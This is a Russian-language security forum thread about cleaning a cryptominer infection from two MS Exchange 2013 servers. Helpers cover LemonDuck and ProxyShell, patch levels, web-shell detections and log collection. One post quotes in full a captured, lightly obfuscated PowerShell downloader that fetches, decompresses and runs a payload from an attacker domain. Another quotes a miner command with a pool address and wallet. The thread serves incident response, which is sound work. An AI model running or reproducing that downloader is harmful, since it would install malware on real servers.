Выбрать дату в календареВыбрать дату в календаре

MS Exchange 2013 поймали заразу на двух серверах
[QUOTE]RP55 RP55 написал:
+
[URL=https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html]https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html[/URL] [/QUOTE]

здесь [B]RP55[/B], скорее прав,
что атака была и с этой стороны, судя по тому, что в одном из апрельских образов (на другом почт сервере), запускался такой скрипт.

[code]"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97asd123';$ifp=$env:tmp+'\m6.bin';$down_url='хттп://[B]d.hwqloan.com[/B]';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&VMCTFH-MAIL^^^&36780342-A764-974C-DAE2-ACFBD65CC3C0^^^&00:50:56:83:FF:5F');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|CzdpTG6VH1.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe [/code]
но там после уст патчей все затихло сразу. те данная атака прекратилась.

(хотя и не факт, что именно они сейчас запускают майнер)
MS Exchange 2013 поймали заразу на двух серверах
[B]что еще нужно проверить. [/B]

судя по списку установленного ПО, у вас версия 15.0.1497.2 кумулятивного обновления
Microsoft Exchange Server 2013 Cumulative Update 23
выпуск этого обновления был от
Exchange Server 2013 CU23 18 июня 2019 г. 15.0.1497.2 15.00.1497.002

после этого
Exchange Server 2013 CU23 18 июня 2019 г. 15.0.1497.2 15.00.1497.002
были еще новые выпуски:

  Exchange Server 2013 CU23 Jul21SU 13 июля 2021 г. 15.0.1497.23 15.00.1497.023
  Exchange Server 2013 CU23 May21SU 11 мая 2021 г. 15.0.1497.18 15.00.1497.018
  Exchange Server 2013 CU23 Apr21SU 13 апреля 2021 г. 15.0.1497.15 15.00.1497.015
  Exchange Server 2013 CU23 Mar21SU 2 марта 2021 г. 15.0.1497.12 15.00.1497.012

возможно,
некорректное отображение версии обновления в списке установленного ПО,
а возможно,
установлено неактуальное обновление для Microsoft Exchange Server 2013

https://docs.microsoft.com/ru-ru/exchange/new-features/build-numbers-and-release-dates
MS Exchange 2013 поймали заразу на двух серверах
возможен и такой вариант проникновения.

[B]ProxyShell активно используется для установки веб-шеллов[/B]
В настоящее время эксплойт сбрасывает веб-оболочку размером 265 КБ в папку[B] c: \ inetpub \ wwwroot \ aspnet_client \[/B].
веб-оболочки состоят из простого защищенного аутентификацией сценария, который злоумышленники могут использовать для загрузки файлов на скомпрометированный сервер Microsoft Exchange.
злоумышленники используют первую веб-оболочку для загрузки дополнительной веб-оболочки в папку с удаленным доступом и два исполняемых файла в папки C: \ Windows \ System32
Если два исполняемых файла не могут быть найдены, в следующей папке будет создана другая веб-оболочка в виде файлов ASPX со случайным именем.
[B]C: \ Program Files \ Microsoft \ Exchange Server \ V15 \ FrontEnd \ HttpProxy \ owa \ auth \[/B]
Злоумышленники используют вторую веб-оболочку для запуска исполняемого файла (пример: createhidetask.exe), который создает запланированную задачу с именем (например:PowerManager), которая запускает исполняемый файл (например:ApplicationUpdate.exe ) в 1 час ночи каждый день.
исполняемый файл ApplicationUpdate.exe - это пользовательский загрузчик .NET, используемый в качестве бэкдора.
«ApplicationUpdate.exe - это загрузчик .NET, который загружает другой двоичный файл .NET с удаленного сервера (который в настоящее время обслуживает полезную нагрузку)

https://www.bleepingcomputer.com/news/microsoft/hackers-now-backdoor-microsoft-exchange-using-proxyshell-exploits/

если смотреть по пред логам сканирования от мбам: (от 28.07)
[QUOTE][SIZE=10pt]Backdoor.Hafnium.Shell, C:\USERS\M.KONDRATENKO\APPDATA\ROAMING\Microsoft\Windows\Recent\iisstart.aspx.lnk, Помещено в карантин, 16927, 926908, , , , , ED05CFED65BC2E502E951C135327EBB7, 76988CB834B065119A6960092FF61CAF7FA24DBC9F65E8EF469A2F6EB22F6597
Backdoor.Hafnium.Shell, C:\INETPUB\WWWROOT\ASPNET_CLIENT\SYSTEM_WEB\IISSTART.ASPX, Помещено в карантин, 16927, 926908, 1.0.43628, , ame, , 0D5FB80F2F6ABF8182E82DC680F8F4B8, E9AB861970DDC99D06914A71D089EBA4E42F3216AEA3A43E1FD551FBDF9A­0E16
[/QUOTE][/SIZE]
+
[QUOTE]-Информация о веб-сайте-
Категория: Троянская программа
Домен:
IP-адрес: 192.227.134.73
Порт: 443
Тип: Входящий трафик
Файл: System[/QUOTE]

может, стоит еще раз проверить сканированием в мбам, что он найдет в этот раз, после новых запусков.
Nirsoft выпустил инструмент: DNSLookupView
это и uVS может сделать. здесь важно чтобы отслеживание было непрерывное, и хорошо, если момент запуска попадет в период до отсечения лога.

но программа полезная будет для анализа.
Файл hosts, Файл hosts
[QUOTE]Danil Perepelyak написал:
Как работает образ автозапуска? [/QUOTE]
ссылка как создать образ автозапуска ниже
MS Exchange 2013 поймали заразу на двух серверах
Владимир,
стоит еще выполнить поиск в сети по след. параметрам:
[CODE]44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX[/CODE]
возможно, это адрес кошелька
+
pool.supportxmr.com:443

Apr 29 2021
[QUOTE]Exchange Server Vulnerability - Still Having Issues after all Patch and CU20 Updates

Hello everyone,

As per Microsoft Recommendations, we already installed all security patches earlier in the March and installed CU 20 updates. Here are the details about our issues. Any help on this will be appreciated:

Issue: High CPU utilization due to cmd.exe process

Exchange 2016 Standard

Work done so far:
All patches installed, CU 20 installed, Performed multiple scan with Microsoft Safety Scanner, every time it finds and remove "Backdoor:MSIL/Chopper.F!dha " but next day same issue occurs

Opened CMD.exe file with process explorer today and found following scripts:
[CODE]C:\Windows\System32\cmd.exe -o 95.216.46.125:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON
[/CODE]
Also ran Exchange Mitigation Tool and it did not found anything.[/QUOTE]

https://docs.microsoft.com/en-us/answers/questions/376174/exchange-server-vulnerability-still-having-issues.html
поговорить о uVS, Carberp, планете Земля
[QUOTE]RP55 RP55 написал:
На V.T. обновили базы теперь файл  cef5aa279f639d500f83f51ae3bb846a2908019d  определяется как 1/68:  ESET-NOD32  A Variant Of MSIL/Agent.URR[/QUOTE]
теперь уже 14 детектов.
Дрвеб добавил -  DrWeb Trojan.LoaderNET.3, и ЛК --  Kaspersky HEUR:Trojan.MSIL.Agent.gen
MS Exchange 2013 поймали заразу на двух серверах
[QUOTE]Владимир Шариков написал:
santy  написал:1. запуск происх примерно в одно и тоже время на обоих серверах.

я бы не сказал, 03:48:12 [2021.07.30] и 17:34:15 [2021.08.07]Цитата[/QUOTE]

нет,
имел ввиду, что когда происходит запуск какой-то день, то запуске происходят примерно в одно и то же время на обоих серверах.

по 2021.07.30 у нас были логи только с одного сервера

а вот 2021.08.07 есть логи от обоих серверов, и здесь видно, что время запуска примерно одинаковое

[SIZE=14pt]17:34:15 [2021.08.07] на SPHVMAIL01
17:43:35 [2021.08.07] на IZTVMAIL01

[/SIZE]с другой стороны, согласен, что четкого расписания по времени нет в разные дни

склоняюсь к версии, либо проникновение возможно в сеть, либо удаленный запуск через доступную уязвимость
+ имеет смысл проверить дату изменения паролей учетных записей (если не было изменений после взлома, то сменить пароли)
---------
вот опять недавно пишут про новую обнаруженную уязвимость ProxyShell

ProxyShell - это название трех уязвимостей, которые при объединении в цепочку выполняют удаленное выполнение кода без проверки подлинности на серверах Microsoft Exchange.

Эти связанные уязвимости используются удаленно через службу клиентского доступа (CAS) Microsoft Exchange, работающую на порту 443 в IIS.

В атаках ProxyShell используются три связанных уязвимости:

CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (исправлено в апреле KB5001779)
CVE-2021-34523 - Повышение привилегий для серверной части Exchange PowerShell (исправлено в апреле, KB5001779)
CVE-2021-31207 - Запись произвольного файла после авторизации приводит к RCE (исправлено в мае KB5003435)

https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-scanned-for-proxyshell-vulnerability-patch-now/

если есть возможность, проверьте по журналам было ли вторжение в локальную сеть (проникновение  или удаленное выполнение кода  в данных интервалах времени
17:34:15 [2021.08.07] на SPHVMAIL01
17:43:35 [2021.08.07] на IZTVMAIL01

[QUOTE]Это самое сложное "В нужный момент". Я так понял что если перезаписывает лог каждый час, необходимо попасть(не спать) в этот час? [/QUOTE]

да, успеть создать образ автозапуска пока система не затерла в логах DNS нужные записи, связанные с запуском процесса.
в принципе, можно создать скрипт с созданием образа автозапуска из uVS, который бы сработал на запуск майнера.
автоматически сразу после обнаружения процесса запуска майнера.
(важно, чтобы отслеживание на сервере было уже включено: и процессов и DNS)
[B]ну, собственно прописать в скрипте:
"создать образ автозапуска"
выгрузить процесс майнера после завершения создания образа автозапуска"
и "отключить отслеживание".[/B]

или создать задачу, которая бы с определенной периодичностью запускала скрипт,
скрипт сканирует список процессов
если находит процесс с майнером, то запускает uVS на создание образа автозапуска, после завершения выгружает процесс майнера,
закрывает отслеживание
+
отправляет сообщение на почту администратору.

важно определить сколько по времени займет однократный процесс сканирования, чтобы определить с какой периодичностью можно запускать задачу.
поговорить о uVS, Carberp, планете Земля
детальный анализ от Sophos работы ботнета MyKing по сути boot.DarkGalaxy с которым столкнулись два года назад. https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophoslabs-uncut-mykings-report.pdf
взлом по RDP
логи из взломанной системы можете добавить?  образ автозапуска системы, + лог ESETlogCollector